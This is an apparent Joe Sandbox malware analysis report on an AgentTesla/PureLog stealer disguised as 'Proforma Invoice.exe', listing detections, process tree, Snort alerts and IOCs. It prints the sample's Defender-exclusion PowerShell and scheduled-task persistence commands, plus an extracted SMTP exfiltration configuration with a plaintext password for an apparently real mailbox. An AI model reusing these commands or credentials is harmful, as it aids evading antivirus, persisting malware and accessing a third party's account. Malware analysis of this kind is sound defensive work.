Edit tour

Windows Analysis Report
Proforma Invoice.exe

Overview

General Information

Sample name:	Proforma Invoice.exe
Analysis ID:	1399273
MD5:	b774ca62d4f7e4a8359a40c7cad50ddb
SHA1:	09467ea941b0c2c65cf908419847a7b3f948cc44
SHA256:	b9008d07600af358e885fe396b52bbc6efbc135f7010e6aa6849c3af952dd9fb
Tags:	AgentTeslaexeInvoice
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Contains functionality to log keystrokes (.Net Source)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Proforma Invoice.exe (PID: 6412 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: B774CA62D4F7E4A8359A40C7CAD50DDB)

powershell.exe (PID: 6764 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2004 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7516 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7220 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Proforma Invoice.exe (PID: 7372 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: B774CA62D4F7E4A8359A40C7CAD50DDB)

VoAlKljQu.exe (PID: 7492 cmdline: C:\Users\user\AppData\Roaming\VoAlKljQu.exe MD5: B774CA62D4F7E4A8359A40C7CAD50DDB)

schtasks.exe (PID: 7712 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

VoAlKljQu.exe (PID: 7764 cmdline: C:\Users\user\AppData\Roaming\VoAlKljQu.exe MD5: B774CA62D4F7E4A8359A40C7CAD50DDB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.1726797038.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1686647135.0000000003599000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1685780768.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1726797038.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1689723543.0000000005080000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1689597695.0000000005000000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1726797038.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1685780768.0000000002988000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1685780768.0000000002591000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: Proforma Invoice.exe PID: 6412	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Proforma Invoice.exe PID: 6412	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Proforma Invoice.exe PID: 6412	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Proforma Invoice.exe PID: 7372	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Proforma Invoice.exe PID: 7372	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: VoAlKljQu.exe PID: 7492	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: VoAlKljQu.exe PID: 7764	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VoAlKljQu.exe PID: 7764	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Proforma Invoice.exe.3599970.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.25d0894.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.3599970.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.25c087c.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.5080000.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.VoAlKljQu.exe.2b80898.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.2a00cd0.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.VoAlKljQu.exe.2fb0ce8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.VoAlKljQu.exe.2fb0ce8.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.VoAlKljQu.exe.2b70880.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.5000000.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.5000000.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.3943ce8.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Proforma Invoice.exe.3943ce8.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Proforma Invoice.exe.3943ce8.9.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x318b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x319d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31a3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31aaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31b45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31bd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.VoAlKljQu.exe.2f72f20.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.VoAlKljQu.exe.2b70880.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.5080000.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.29b3ed8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.25d0894.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.29b8ef0.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.25c087c.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.2a00cd0.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.Proforma Invoice.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.Proforma Invoice.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.Proforma Invoice.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x336b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x337d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3383d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x338af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x339d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Proforma Invoice.exe.29c2f08.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x336b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x337d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3383d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x338af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x339d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Proforma Invoice.exe.39090c8.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Proforma Invoice.exe.39090c8.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Proforma Invoice.exe.39090c8.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x318b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x319d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31a3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31aaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31b45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31bd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Proforma Invoice.exe.39090c8.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Proforma Invoice.exe.39090c8.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Proforma Invoice.exe.39090c8.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Proforma Invoice.exe.39090c8.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e265:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x336b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e2d7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e361:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x337d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e3f3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3383d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e45d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x338af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e4cf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e565:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x339d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e5f5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.VoAlKljQu.exe.2b80898.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 34 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Proforma Invoice.exe, ParentImage: C:\Users\user\Desktop\Proforma Invoice.exe, ParentProcessId: 6412, ParentProcessName: Proforma Invoice.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, ProcessId: 6764, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VoAlKljQu.exe, ParentImage: C:\Users\user\AppData\Roaming\VoAlKljQu.exe, ParentProcessId: 7492, ParentProcessName: VoAlKljQu.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp, ProcessId: 7712, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Proforma Invoice.exe, Initiated: true, ProcessId: 7372, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\Proforma Invoice.exe, ParentImage: C:\Users\user\Desktop\Proforma Invoice.exe, ParentProcessId: 6412, ParentProcessName: Proforma Invoice.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, ProcessId: 7220, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\Proforma Invoice.exe, ParentImage: C:\Users\user\Desktop\Proforma Invoice.exe, ParentProcessId: 6412, ParentProcessName: Proforma Invoice.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe, ProcessId: 6764, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\Proforma Invoice.exe, ParentImage: C:\Users\user\Desktop\Proforma Invoice.exe, ParentProcessId: 6412, ParentProcessName: Proforma Invoice.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp, ProcessId: 7220, ProcessName: schtasks.exe

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:06.420135
SID:	2851779
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:03.102734
SID:	2855542
Source Port:	49736
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Exfil via SMTP - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:03.102734
SID:	2855245
Source Port:	49736
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:03.102734
SID:	2840032
Source Port:	49736
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:06.420135
SID:	2855542
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Exfil via SMTP - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:06.420135
SID:	2855245
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:06.420135
SID:	2840032
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:06.420071
SID:	2030171
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:03.102734
SID:	2030171
Source Port:	49736
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 50.87.139.143

Timestamp:	02/27/24-08:27:03.102734
SID:	2851779
Source Port:	49736
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Virustotal: Detection: 65%			Perma Link

Multi AV Scanner detection for submitted file

Source: Proforma Invoice.exe	ReversingLabs: Detection: 63%
Source: Proforma Invoice.exe	Virustotal: Detection: 65%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Proforma Invoice.exe

Joe Sandbox ML: detected

Source: Proforma Invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: Proforma Invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

